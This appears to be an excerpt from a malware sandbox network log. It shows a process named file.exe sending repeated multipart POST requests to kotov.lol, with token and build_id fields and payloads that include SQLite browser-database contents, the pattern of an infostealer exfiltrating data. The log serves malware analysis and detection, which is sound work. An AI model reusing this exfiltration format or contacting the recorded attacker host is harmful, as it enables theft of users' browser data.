                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:35 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------IDHCGDAFBKFIDHJJJDHCCont
                                                                                                                    2024-11-30 10:34:36 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:36 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.44976895.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:37 UTC319OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 169765
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------IIIDAKJDHJKFHIEBFCGHCont
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:37 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                    Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                    2024-11-30 10:34:39 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.44976995.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:38 UTC318OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 66001
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:38 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 47 44 47 49 49 44 47 43 46 49 44 48 44 48 44 48 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------AFHDGDGIIDGCFIDHDHDHContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------AFHDGDGIIDGCFIDHDHDHCont
                                                                                                                    2024-11-30 10:34:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:38 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:39 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:39 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.44977095.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:41 UTC319OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 153381
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
